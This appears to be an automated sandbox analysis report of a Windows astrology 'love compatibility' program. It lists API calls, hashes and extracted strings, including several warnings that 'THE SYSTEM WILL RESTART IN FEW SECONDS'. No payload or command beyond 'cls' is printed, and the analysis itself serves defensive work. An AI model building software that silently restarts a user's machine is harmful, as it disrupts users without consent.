                                                                          0x013d3245
                                                                          0x013d3247
                                                                          0x013d324c
                                                                          0x013d3251
                                                                          0x013d325b
                                                                          0x013d3260
                                                                          0x013d3263
                                                                          0x013d326d
                                                                          0x013d3274
                                                                          0x013d3279
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d3281
                                                                          0x013d328e
                                                                          0x013d3295
                                                                          0x013d3297
                                                                          0x013d329c
                                                                          0x013d32a1
                                                                          0x013d32ab
                                                                          0x013d32b0
                                                                          0x013d32b3
                                                                          0x013d32bd
                                                                          0x013d32c4
                                                                          0x013d32c9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d32d1
                                                                          0x013d32de
                                                                          0x013d32e5
                                                                          0x013d32e7
                                                                          0x013d32ec
                                                                          0x013d32f1
                                                                          0x013d32fb
                                                                          0x013d3300
                                                                          0x013d3303
                                                                          0x013d330d
                                                                          0x013d3314
                                                                          0x013d3319
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d3321
                                                                          0x013d332e
                                                                          0x013d3335
                                                                          0x013d3337
                                                                          0x013d333c
                                                                          0x013d3341
                                                                          0x013d334b
                                                                          0x013d3350
                                                                          0x013d3353
                                                                          0x013d335d
                                                                          0x013d3364
                                                                          0x013d3369
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d3371
                                                                          0x013d337e
                                                                          0x013d3385
                                                                          0x013d3387
                                                                          0x013d338c
                                                                          0x013d3391
                                                                          0x013d339b
                                                                          0x013d33a0
                                                                          0x013d33a3
                                                                          0x013d33ad
                                                                          0x013d33b4
                                                                          0x013d33b9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d33c1
                                                                          0x013d33ce
                                                                          0x013d33d5
                                                                          0x013d33d7
                                                                          0x013d33dc
                                                                          0x013d33e1
                                                                          0x013d33eb
                                                                          0x013d33f0
                                                                          0x013d33f3
                                                                          0x013d33fd
                                                                          0x013d3404
                                                                          0x013d3409
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d3411
                                                                          0x013d341e
                                                                          0x013d3425
                                                                          0x013d3427
                                                                          0x013d342c
                                                                          0x013d3431
                                                                          0x013d343b
                                                                          0x013d3440
                                                                          0x013d3443
                                                                          0x013d344d
                                                                          0x013d3454
                                                                          0x013d3459
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d3461
                                                                          0x013d346e
                                                                          0x013d3475
                                                                          0x013d3477
                                                                          0x013d347c
                                                                          0x013d3481
                                                                          0x013d348b
                                                                          0x013d3490
                                                                          0x013d3493
                                                                          0x013d349d
                                                                          0x013d34a4
                                                                          0x013d34a9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d34ae
                                                                          0x013d34bb
                                                                          0x013d34c2
                                                                          0x013d34c4
                                                                          0x013d34c9
                                                                          0x013d34ce
                                                                          0x013d34d8
                                                                          0x013d34dd
                                                                          0x013d34e0
                                                                          0x013d34ea
                                                                          0x013d34f1
                                                                          0x013d34f6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d350e
                                                                          0x013d3513
                                                                          0x013d351b
                                                                          0x013d351c
                                                                          0x013d3521
                                                                          0x013d352b
                                                                          0x013d3530
                                                                          0x013d3534
                                                                          0x013d3535
                                                                          0x013d353a
                                                                          0x013d3544
                                                                          0x013d354d
                                                                          0x013d355f
                                                                          0x013d3560
                                                                          0x013d3565
                                                                          0x013d356a
                                                                          0x013d356d
                                                                          0x013d3572
                                                                          0x013d357a
                                                                          0x013d3582
                                                                          0x013d358a
                                                                          0x013d3592
                                                                          0x013d359f
                                                                          0x013d35a0
                                                                          0x00000000
                                                                          0x013d2f07
                                                                          0x00000000

                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D2E7C
                                                                          • __wsystem.LIBCMT ref: 013D2F13
                                                                          • _wprintf.LIBCMT ref: 013D2F38
                                                                          • _wprintf.LIBCMT ref: 013D2FB3
                                                                          • _wprintf.LIBCMT ref: 013D2FBD
                                                                          • _wprintf.LIBCMT ref: 013D2FED
                                                                          • _wprintf.LIBCMT ref: 013D2FFA
                                                                          • __wsystem.LIBCMT ref: 013D3011
                                                                          • __wsystem.LIBCMT ref: 013D3039
                                                                          • _wprintf.LIBCMT ref: 013D2EC3
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D164F
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D1663
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D1677
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D168B
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D169F
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D16B3
                                                                            • Part of subcall function 013D1640: _wprintf.LIBCMT ref: 013D16C7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D2E9F
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • __wsystem.LIBCMT ref: 013D2E61
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D305E
                                                                          • _wprintf.LIBCMT ref: 013D3075
                                                                          • _wprintf.LIBCMT ref: 013D3093
                                                                          • _wprintf.LIBCMT ref: 013D30A4
                                                                          • _wprintf.LIBCMT ref: 013D30C5
                                                                          • _wprintf.LIBCMT ref: 013D30E7
                                                                          • _wprintf.LIBCMT ref: 013D30FB
                                                                          • __wsystem.LIBCMT ref: 013D3112
                                                                          • __wsystem.LIBCMT ref: 013D3513
                                                                          • _wprintf.LIBCMT ref: 013D352B
                                                                          • _wprintf.LIBCMT ref: 013D3544
                                                                          • _wprintf.LIBCMT ref: 013D3565
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$* If you are enemy, you will fight with the most determined obstinacy.$* If you are in love, you are generous to the last degree, and will consider no sacrifice too great for the person you care for.$* You are usually very cautious when dealing with people, life and money.$* You have a curious power of dominating others, even when not conscious of trying to do so.$* You tend to be very patient, practical and dedicated.$Enter any key....$%d$($------------------------------------------------------------------$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$Sex=%c$TAURUS AND AQUARIUS LOVE COMPATIBILITY$TAURUS AND ARIES LOVE COMPATIBILITY$TAURUS AND CANCER LOVE COMPATIBILITY$TAURUS AND CAPRICORN LOVE COMPATIBILITY$TAURUS AND GEMINI LOVE COMPATIBILITY$TAURUS AND LEO LOVE COMPATIBILITY$TAURUS AND LIBRA LOVE COMPATIBILITY$TAURUS AND PISCES LOVE COMPATIBILITY$TAURUS AND SAGGITARIUS LOVE COMPATIBILITY$TAURUS AND SCORPIO LOVE COMPATIBILITY$TAURUS AND TAURUS LOVE COMPATIBILITY$TAURUS AND VIRGO LOVE COMPATIBILITY$YOUR LUCKY NUMBERS ARE: %d$cls$gfff$gfff$gfff$2R
                                                                          • API String ID: 2876428006-2759143653
                                                                          • Opcode ID: 1f887f107078bf7528ceffe80d56d32e77c63619240d6d21cf246d8f4ea8ae62
                                                                          • Instruction ID: 4ffc1a522b1c1d7bd3528abceee3687fe7544845b81227871ffa983210a834cc
                                                                          • Opcode Fuzzy Hash: 1f887f107078bf7528ceffe80d56d32e77c63619240d6d21cf246d8f4ea8ae62
                                                                          • Instruction Fuzzy Hash: 05F1E3F3904246ABD210BFEFBC05D5F7A6DABA679CF05042CF54896344EA71852887B3
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D2710, Relevance: 145.7, APIs: 49, Strings: 34, Instructions: 461COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D2736
                                                                          • __wsystem.LIBCMT ref: 013D27CC
                                                                          • _wprintf.LIBCMT ref: 013D27EE
                                                                          • _wprintf.LIBCMT ref: 013D2856
                                                                          • _wprintf.LIBCMT ref: 013D2860
                                                                          • _wprintf.LIBCMT ref: 013D288B
                                                                          • _wprintf.LIBCMT ref: 013D2895
                                                                          • __wsystem.LIBCMT ref: 013D28AC
                                                                          • __wsystem.LIBCMT ref: 013D28D1
                                                                          • _wprintf.LIBCMT ref: 013D28F3
                                                                          • _wprintf.LIBCMT ref: 013D2907
                                                                          • _wprintf.LIBCMT ref: 013D291F
                                                                          • _wprintf.LIBCMT ref: 013D2930
                                                                          • _wprintf.LIBCMT ref: 013D2952
                                                                          • _wprintf.LIBCMT ref: 013D2978
                                                                          • _wprintf.LIBCMT ref: 013D298C
                                                                          • __wsystem.LIBCMT ref: 013D29A3
                                                                          • _wprintf.LIBCMT ref: 013D2779
                                                                            • Part of subcall function 013D15D0: _wprintf.LIBCMT ref: 013D15DF
                                                                            • Part of subcall function 013D15D0: _wprintf.LIBCMT ref: 013D15F3
                                                                            • Part of subcall function 013D15D0: _wprintf.LIBCMT ref: 013D1607
                                                                            • Part of subcall function 013D15D0: _wprintf.LIBCMT ref: 013D161B
                                                                            • Part of subcall function 013D15D0: _wprintf.LIBCMT ref: 013D162F
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D2758
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • __wsystem.LIBCMT ref: 013D271E
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • __wsystem.LIBCMT ref: 013D2D4D
                                                                          • _wprintf.LIBCMT ref: 013D2D62
                                                                          • _wprintf.LIBCMT ref: 013D2D7A
                                                                          • _wprintf.LIBCMT ref: 013D2D98
                                                                          • _wprintf.LIBCMT ref: 013D2DE3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$* The lower type of this sign will stick at nothing to accomplish your purpose. The higher type are good masters, but at the same time severe in discipline and more or less unbending in everything you expect from other people.$* These people are usually independent in everything you do.$* You also have the greatest ability as organizer on a large scale. You find yourself as the organizers of big schemes or as the heads of big businesses, and also in the organization and development of countries.$* You are born to be fighter in every sense of the world$* You have unusually strong willpower and great obstinancy of purpose$* You seem naturally to resent all criticism, and the only way to offset this in you is by quiet logic, reason, and proof.$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%d$------------------------------------------------------------------$ARIES AND AQUARIUS LOVE COMPATIBILITY$ARIES AND ARIES LOVE COMPATIBILITY$ARIES AND CANCER LOVE COMPATIBILITY$ARIES AND CAPRICORN LOVE COMPATIBILITY$ARIES AND GEMINI LOVE COMPATIBILITY$ARIES AND LEO LOVE COMPATIBILITY$ARIES AND LIBRA LOVE COMPATIBILITY$ARIES AND PISCES LOVE COMPATIBILITY$ARIES AND SAGGITARIUS LOVE COMPATIBILITY$ARIES AND SCORPIO LOVE COMPATIBILITY$ARIES AND TAURUS LOVE COMPATIBILITY$ARIES AND VIRGO LOVE COMPATIBILITY$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$Sex=%c$YOUR LUCKY NUMBERS ARE: %d$cls$gfff$gfff
                                                                          • API String ID: 2876428006-2714157573
                                                                          • Opcode ID: 19c7db77bc51bae8c977d28b706fd4197ba30cfb0e68d14c577ce958f6d6a118
                                                                          • Instruction ID: 88d3d04fd5b04b9e2a078efff8094ebdef20cf1b36f8fdbc6ff142dd1fadf381
                                                                          • Opcode Fuzzy Hash: 19c7db77bc51bae8c977d28b706fd4197ba30cfb0e68d14c577ce958f6d6a118
                                                                          • Instruction Fuzzy Hash: 94E1E1B7640246BBC714BBEFBC05E5F7A6DAFA639CF02011CF5546A204DB74850587B2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D7840, Relevance: 138.7, APIs: 49, Strings: 30, Instructions: 485COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D784D
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D7865
                                                                          • _wprintf.LIBCMT ref: 013D7887
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D78A9
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B1F
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B33
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B47
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B5B
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B6F
                                                                            • Part of subcall function 013D1B10: _wprintf.LIBCMT ref: 013D1B83
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D78EC
                                                                          • _wprintf.LIBCMT ref: 013D7911
                                                                          • _wprintf.LIBCMT ref: 013D7981
                                                                          • _wprintf.LIBCMT ref: 013D798B
                                                                          • _wprintf.LIBCMT ref: 013D79B6
                                                                          • _wprintf.LIBCMT ref: 013D79C0
                                                                          • __wsystem.LIBCMT ref: 013D79D7
                                                                          • __wsystem.LIBCMT ref: 013D79FF
                                                                          • _wprintf.LIBCMT ref: 013D7A24
                                                                          • _wprintf.LIBCMT ref: 013D7A38
                                                                          • _wprintf.LIBCMT ref: 013D7A65
                                                                          • _wprintf.LIBCMT ref: 013D7A78
                                                                          • _wprintf.LIBCMT ref: 013D7A99
                                                                          • _wprintf.LIBCMT ref: 013D7ABB
                                                                          • _wprintf.LIBCMT ref: 013D7ACF
                                                                          • __wsystem.LIBCMT ref: 013D7AE6
                                                                          • __wsystem.LIBCMT ref: 013D7EC3
                                                                          • _wprintf.LIBCMT ref: 013D7ED8
                                                                          • _wprintf.LIBCMT ref: 013D7EF0
                                                                          • _wprintf.LIBCMT ref: 013D7F0E
                                                                          • _wprintf.LIBCMT ref: 013D7F45
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%d$------------------------------------------------------------------$6$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$PISCES AND AQUARIUS LOVE COMPATIBILITY$PISCES AND ARIES LOVE COMPATIBILITY$PISCES AND CANCER LOVE COMPATIBILITY$PISCES AND CAPRICORN LOVE COMPATIBILITY$PISCES AND GEMINI LOVE COMPATIBILITY$PISCES AND LEO LOVE COMPATIBILITY$PISCES AND LIBRA LOVE COMPATIBILITY$PISCES AND PISCES LOVE COMPATIBILITY$PISCES AND SAGGITARIUS LOVE COMPATIBILITY$PISCES AND SCORPIO LOVE COMPATIBILITY$PISCES AND TAURUS LOVE COMPATIBILITY$PISCES AND VIRGO LOVE COMPATIBILITY$Sex=%c$YOUR LUCKY NUMBERS ARE: %d$cls$gfff$gfff$gfff
                                                                          • API String ID: 2876428006-578333464
                                                                          • Opcode ID: 0c675b286094d4af1db111cf366031d555f31c74658aea253e406f8bdb031297
                                                                          • Instruction ID: 2b310d355c6bed9108db22b3ab3e8864dfa532143d256952a21f937d7c096e34
                                                                          • Opcode Fuzzy Hash: 0c675b286094d4af1db111cf366031d555f31c74658aea253e406f8bdb031297
                                                                          • Instruction Fuzzy Hash: 4EF1A1B3A0014AABC704BFEEBD45D6F766DABA638CF02411CF59467208DB748C1587B2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D6930, Relevance: 137.0, APIs: 49, Strings: 29, Instructions: 478COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D693D
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D6955
                                                                          • _wprintf.LIBCMT ref: 013D6977
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D6999
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1A5F
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1A73
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1A87
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1A9B
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1AAF
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1AC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D69DC
                                                                          • _wprintf.LIBCMT ref: 013D6A01
                                                                          • _wprintf.LIBCMT ref: 013D6A71
                                                                          • _wprintf.LIBCMT ref: 013D6A7B
                                                                          • _wprintf.LIBCMT ref: 013D6AA6
                                                                          • _wprintf.LIBCMT ref: 013D6AB0
                                                                          • __wsystem.LIBCMT ref: 013D6AC7
                                                                          • __wsystem.LIBCMT ref: 013D6AEF
                                                                          • _wprintf.LIBCMT ref: 013D6B14
                                                                          • _wprintf.LIBCMT ref: 013D6B28
                                                                          • _wprintf.LIBCMT ref: 013D6B42
                                                                          • _wprintf.LIBCMT ref: 013D6B5A
                                                                          • _wprintf.LIBCMT ref: 013D6B78
                                                                          • _wprintf.LIBCMT ref: 013D6B96
                                                                          • _wprintf.LIBCMT ref: 013D6BAA
                                                                          • __wsystem.LIBCMT ref: 013D6BC1
                                                                          • __wsystem.LIBCMT ref: 013D6F99
                                                                          • _wprintf.LIBCMT ref: 013D6FAE
                                                                          • _wprintf.LIBCMT ref: 013D6FC6
                                                                          • _wprintf.LIBCMT ref: 013D6FE4
                                                                          • _wprintf.LIBCMT ref: 013D701B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%d$------------------------------------------------------------------$.$Age=%d$CAPRICORN AND AQUARIUS LOVE COMPATIBILITY$CAPRICORN AND ARIES LOVE COMPATIBILITY$CAPRICORN AND CANCER LOVE COMPATIBILITY$CAPRICORN AND CAPRICORN LOVE COMPATIBILITY$CAPRICORN AND GEMINI LOVE COMPATIBILITY$CAPRICORN AND LEO LOVE COMPATIBILITY$CAPRICORN AND LIBRA LOVE COMPATIBILITY$CAPRICORN AND PISCES LOVE COMPATIBILITY$CAPRICORN AND SAGGITARIUS LOVE COMPATIBILITY$CAPRICORN AND SCORPIO LOVE COMPATIBILITY$CAPRICORN AND TAURUS LOVE COMPATIBILITY$CAPRICORN AND VIRGO LOVE COMPATIBILITY$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$Sex=%c$YOUR LUCKY NUMBERS ARE: %d$cls$gfff$gfff
                                                                          • API String ID: 2876428006-249628096
                                                                          • Opcode ID: 18d96da8a288fc5aadc8a856240718d78cf70735d17aae519bd1590e670f7a36
                                                                          • Instruction ID: 8284408305c25e171ebef8e42c78a3c4ac76cd522903a17bea7b0d0ee1f94246
                                                                          • Opcode Fuzzy Hash: 18d96da8a288fc5aadc8a856240718d78cf70735d17aae519bd1590e670f7a36
                                                                          • Instruction Fuzzy Hash: 86E1C4F3A0424AABD700BFEEBD41D6F366DABA639CF01411CF56466208DB7458158BB3
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D5AAF, Relevance: 137.0, APIs: 49, Strings: 29, Instructions: 477COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D5B0E
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D5B26
                                                                          • _wprintf.LIBCMT ref: 013D5B48
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D5B69
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D194F
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D1963
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D1977
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D198B
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D199F
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D19B3
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D19C7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
